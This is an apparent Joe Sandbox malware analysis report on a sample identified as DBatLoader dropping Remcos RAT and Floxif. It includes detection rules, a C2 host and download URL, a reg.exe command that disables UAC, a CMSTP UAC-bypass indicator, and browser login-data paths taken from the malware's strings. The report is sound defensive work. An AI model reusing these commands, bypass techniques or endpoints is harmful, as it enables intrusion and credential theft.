35.2.SndVol.exe.3300000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
35.2.SndVol.exe.3300000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
35.2.SndVol.exe.3300000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
35.2.SndVol.exe.3300000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
35.2.SndVol.exe.3300000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
0.0.0vJrK0NCd1.exe.400000.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0.2.0vJrK0NCd1.exe.2899224.1.raw.unpack	JoeSecurity_FloodFix	Yara detected FloodFix	Joe Security
0.2.0vJrK0NCd1.exe.2899224.1.raw.unpack	MALWARE_Win_FloodFix	Detects FloodFix	ditekSHen
0.2.0vJrK0NCd1.exe.2899224.1.raw.unpack	MAL_Floxif_Generic	Detects Floxif Malware	Florian Roth
38.2.colorcpl.exe.2b50000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
38.2.colorcpl.exe.2b50000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
38.2.colorcpl.exe.2b50000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x657e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6577c:$s1: CoGetObject 0x65790:$s1: CoGetObject 0x657ac:$s1: CoGetObject 0x6f738:$s1: CoGetObject 0x6573c:$s2: Elevation:Administrator!new:
38.2.colorcpl.exe.2b50000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b8a8:$a1: Remcos restarted by watchdog! 0x6be20:$a3: %02i:%02i:%02i:%03i
38.2.colorcpl.exe.2b50000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x658fc:$str_a1: C:\Windows\System32\cmd.exe 0x65878:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65878:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65d78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x665a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6596c:$str_b2: Executing file: 0x669ec:$str_b3: GetDirectListeningPort 0x66398:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66518:$str_b7: \update.vbs 0x65994:$str_b9: Downloaded file: 0x65980:$str_b10: Downloading file: 0x65a24:$str_b12: Failed to upload file: 0x669b4:$str_b13: StartForward 0x669d4:$str_b14: StopForward 0x66470:$str_b15: fso.DeleteFile " 0x66404:$str_b16: On Error Resume Next 0x664a0:$str_b17: fso.DeleteFolder " 0x65a14:$str_b18: Uploaded file: 0x659d4:$str_b19: Unable to delete: 0x66438:$str_b20: while fso.FileExists(" 0x65eb1:$str_c0: [Firefox StoredLogins not found]
32.2.Elpuxpki.PIF.2e2056c.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
Click to see the 40 entries

Sigma Signatures

Stealing of Sensitive Information

Sigma detected: Remcos

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 6224, TargetFilename: C:\ProgramData\remcos\logs.dat

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\Public\Libraries\netutils.dll	Avira: detection malicious, Label: TR/Starter.bwokf
Source: C:\Program Files (x86)\eTDdgXlyKliyxvptonffOcjuSNyaDmlKRZHGbQGKEUWyXCTW\kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe.tmp	Avira: detection malicious, Label: W32/Floxif.iici
Source: C:\Windows \System32\netutils.dll	Avira: detection malicious, Label: TR/Starter.bwokf
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Avira: detection malicious, Label: W32/Floxif.hdc
Source: C:\Program Files\Common Files\system\symsrv.dll	Avira: detection malicious, Label: TR/Floxif.BB

Found malware configuration

Source: 0vJrK0NCd1.exe	Malware Configuration Extractor: DBatLoader {"Download Url": "https://balkancelikdovme.com/work/Elpuxpkilck"}
Source: 00000026.00000002.564309116.0000000000608000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: Remcos {"Host:Port:Password": "lart.ydns.eu:1984:1", "Assigned name": "Greatzillart", "Copy file": "remcos.exe", "Mutex": "Rmc-QBZ2IM", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Multi AV Scanner detection for submitted file

Source: 0vJrK0NCd1.exe	ReversingLabs: Detection: 92%
Source: 0vJrK0NCd1.exe	Virustotal: Detection: 84%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 35.2.SndVol.exe.3300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.colorcpl.exe.2b50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0vJrK0NCd1.exe.10030000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.SndVol.exe.3300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.colorcpl.exe.2b50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.564309116.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.532520297.0000000000487000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.637978823.0000000014C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0vJrK0NCd1.exe PID: 6460, type: MEMORYSTR

Antivirus / Scanner detection for submitted sample

Source: 0vJrK0NCd1.exe

Avira: detected

Multi AV Scanner detection for domain / URL

Source: balkancelikdovme.com

Virustotal: Detection: 17%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Common Files\system\symsrv.dll	ReversingLabs: Detection: 92%
Source: C:\Users\Public\Libraries\Elpuxpki.PIF	ReversingLabs: Detection: 92%
Source: C:\Users\Public\Libraries\netutils.dll	ReversingLabs: Detection: 73%
Source: C:\Windows \System32\netutils.dll	ReversingLabs: Detection: 73%

Machine Learning detection for sample

Source: 0vJrK0NCd1.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\Public\Libraries\Elpuxpki.PIF	Joe Sandbox ML: detected
Source: C:\Program Files\Common Files\system\symsrv.dll	Joe Sandbox ML: detected

Source: 0vJrK0NCd1.exe, 00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_073ef517-d

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 35.2.SndVol.exe.3300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.colorcpl.exe.2b50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0vJrK0NCd1.exe.10030000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.SndVol.exe.3300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.colorcpl.exe.2b50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0vJrK0NCd1.exe PID: 6460, type: MEMORYSTR

Source: 0vJrK0NCd1.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.3:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.3:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.3:49737 version: TLS 1.2

Source: C:\Users\user\Desktop\0vJrK0NCd1.exe

Directory created: C:\Program Files\Common Files\System\symsrv.dll

Jump to behavior

Source:	Binary string: wkernel32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.369193151.0000000002389000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.371315397.0000000002E66000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msvcrt.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.371668032.0000000002E62000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wrpcrt4.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.371899566.0000000002E6D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.368861068.0000000002D6A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: shcore.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.376605940.0000000002E65000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bcryptprimitives.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.373786865.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wgdi32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.462920410.0000000002B60000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: fltLib.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.432534742.0000000002B72000.00000004.00000020.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.379261612.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cfgmgr32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.396746922.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: shell32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wrpcrt4.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.371899566.0000000002E6D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: crypt32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CLBCatQ.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.386369418.0000000002E6E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msvcp_win.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.389810334.0000000003411000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wgdi32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.462920410.0000000002B60000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.369676506.0000000002E63000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.393192241.0000000002B71000.00000004.00000020.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.399135721.0000000002B72000.00000004.00000020.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.462920410.0000000002BAB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.444268222.000000007F0F0000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000002.469716889.0000000004F3C000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe
Source:	Binary string: fastprox.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.385818708.0000000002E6E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbH source: 0vJrK0NCd1.exe, 00000000.00000003.444268222.000000007F0F0000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000002.469716889.0000000004F3C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: %s\%.s%s%s%s\%.s (%s)%s%s.partialaction_closesearch_fieldsmartscreen_rowsmartscreen_oldclient_rowlistview_regionaction_clearaction_optionsaction_smartscreen_buttonsearch_glyphdownload_boxcuetextcleardownload_selectormaininetcore\ieframe\browseui\downloadmanager\downloadfilecopier.cpp.automaticdestinations-ms.bat.cab.cat.appx.appxbundle.appxpackage.customdestinations-ms.der.dmp.dsft.cdxml.cer.cmd.cookie.iso.jar.js.lnk.efi.etl.fon.ini.msp.msu.mui.nst.mp.mpb.msip.msm.p12.p7b.p7c.p7m.olb.ost.otf.p10.pem.pfm.pfx.ps1.p7r.p7s.p7x.pdb.psm1.pst.reg.rll.ps1xml.psc1.psd1.psf.sys.ttc.ttf.vbs.sft.spc.spkg.sst.vsi.vsix.wfs.wim.vhd.vhdx.vmcx.vmrsinetcore\ieframe\browseui\downloadmanager\downloadsecurity.cpp.winmd.wsf.xap source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wUxTheme.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.392885475.0000000003411000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: combase.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.372628723.0000000003414000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.371315397.0000000002E66000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cryptbase.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.390086007.0000000002B72000.00000004.00000020.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.372135848.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.369676506.0000000002E63000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: shell32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wuser32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.370202146.0000000002E65000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: fltLib.pdbGCTL source: 0vJrK0NCd1.exe, 00000000.00000003.432534742.0000000002B72000.00000004.00000020.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.379261612.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wgdi32full.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.370600881.0000000002EDB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wgdi32full.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.370600881.0000000002EDB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: shcore.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.376605940.0000000002E65000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ieframe.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wUxTheme.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.392885475.0000000003411000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.368861068.0000000002D6A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ole32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.373400653.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: fastprox.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.385818708.0000000002E6E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: powrprof.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.398187463.0000000003411000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: powrprof.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.398187463.0000000003411000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: version.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.373786865.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: apphelp.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.370004681.00000000029B4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ole32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.373400653.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Windows.Storage.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.376967182.000000000341B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: version.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.373786865.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbGCTL source: 0vJrK0NCd1.exe, 00000000.00000003.369193151.0000000002389000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: comctl32v582.pdbGCTL source: 0vJrK0NCd1.exe, 00000000.00000003.373985159.0000000002E68000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: iertutil.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: comctl32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.382826553.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ieframe.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msvcp_win.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.389810334.0000000003411000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cryptbase.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.390086007.0000000002B72000.00000004.00000020.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.372135848.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: comctl32v582.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.373985159.0000000002E68000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cfgmgr32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.396746922.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: oleaut32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.372403059.0000000002E60000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bcryptprimitives.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.373786865.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Windows.Storage.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.376967182.000000000341B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: combase.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.372628723.0000000003414000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ApplicationFrameWindowWindows.Foundation.Collections.IIterator`1<IUnknown>Windows.Foundation.Collections.IVectorView`1<IUnknown>Windows.Foundation.Collections.IVector`1<IUnknown>@%SystemRoot%\System32\SettingSyncCore.dll,-1024internal\onecoreuapshell\private\inc\shouldswitchtodesktop.hinternal\onecoreuapshell\private\inc\sharedstoragesources\syncrootcommon.hData\Program Files\Data\Program Files (x86)\Data\ProgramData\Data\Windows\Program Files\Program Files (x86)\ProgramData\Windows\$Windows.~BT\Windows.old\.appx.appxbundle.appxpackage.automaticdestinations-ms.cat.cdxml.cer.cookie.customdestinations-ms.dmp.dsft.efi.etl.fon.ini.iso.mp.mpb.msip.msm.mui.nst.ocx.olb.ost.otf.p10.p12.p7b.p7c.p7m.p7r.p7s.p7x.partial.pdb.pem.pfm.pfx.psd1.psf.rll.sft.spc.spkg.sst.ttc.ttf.vmcx.vmrs.vsi.vsix.wfs.wim.winmd.xapFTSearched0000000000000000000BasicPropertiesDocumentPropertiesImagePropertiesVideoPropertiesMusicPropertiesRenameAsyncOverloadDefaultOptionsRenameAsyncIStorageItem2GetParentAsyncIsEqualGetThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetThumbnailAsyncOverloadDefaultOptionsget_DisplayNameIStorageItemProperties2GetScaledImageAsThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetScaledImageAsThumbnailAsyncOverloadDefaultOptionsGetScaledImageAsThumbnailAsyncIStorageItemPropertiesWithProviderget_ProviderIStorageItemThumbnailAccessPrivGetScaledImageOrThumbnailAsyncIStorageItemHandleAcccessOpenAsyncPrivatePauseDeferredUpdateSetStreamedFileCallbackGetStreamedFileCallbackGetSpecialInternalPropertySetSpecialInternalPropertyCreateTempFileInSameLocationCopyOverloadDefaultOptionsCopyOverloadCopyAndReplaceAsyncMoveOverloadDefaultNameAndOptionsWindows.Security.EnterpriseData.FileProtectionManagerMoveOverloadDefaultOptionsoptionsCreateFolderAsyncOverloadDefaultOptionsGetItemAsyncGetItemsAsyncOverloadDefaultStartAndCountCreateFileQueryOverloadDefaultCreateFileQueryCreateFolderQueryOverloadDefaultCreateFolderQueryCreateFolderQueryWithOptionsCreateItemQueryWithOptionsGetFilesAsyncOverloadDefaultStartAndCountGetFoldersAsyncOverloadDefaultStartAndCountget_MusicLibraryget_HomeGroupget_RemovableDevicesget_MediaServerDevicesget_Playlistsget_SavedPicturesget_Objects3Dget_AppCapturesget_RecordedCallsGetFolderForUserAsyncget_ApplicationDataSharedLocalGetPublisherCacheFolderGetApplicationDataFolderForUserGetPublisherCacheFolderForUserknownfolder:{AB5FB87B-7CE2-4F83-915D-550846C9537B}knownfolder:{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}knownfolder:{1C2AC1DC-4358-4B6C-9733-AF21156576F0}knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}knownfolder:{374DE290-123F-4565-9164-39C4925E467B}knownfolder:{bfb9d5e0-c6a9-404c-b2b2-ae6db6af4968}knownfolder:{4BD8D571-6D19-48D3-BE97-422220080E43}knownfolder:{33E28130-4E1E-4676-835A-98395C3BC3BB}knownfolder:{AE50C081-EBD2-438A-8655-8A092E34987A}knownfolder:{C870044B-F49E-4126-A9C3-B52A1FF411E8}knownfolder:{3B193882-D3AD-4eab-965A-69829D1FB59F}knownfolder:{f3ce0f7c-4901-4acc-8648-d5d44b04ef8f}knownfolder:{18989B1D-99B5-455B-841C-AB7C74E4DDFC}get_Langua
Source:	Binary string: CLBCatQ.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.386369418.0000000002E6E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: oleaut32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.372403059.0000000002E60000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: apphelp.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.370004681.00000000029B4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wuser32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.370202146.0000000002E65000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: comctl32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.382826553.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: iertutil.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: crypt32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp

Spreading

Yara detected FloodFix

Source: Yara match	File source: 0.2.0vJrK0NCd1.exe.10000000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0vJrK0NCd1.exe.2899224.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files\Common Files\system\symsrv.dll, type: DROPPED

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Networking

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 6

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: lart.ydns.eu
Source: Malware configuration extractor	URLs: https://balkancelikdovme.com/work/Elpuxpkilck

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

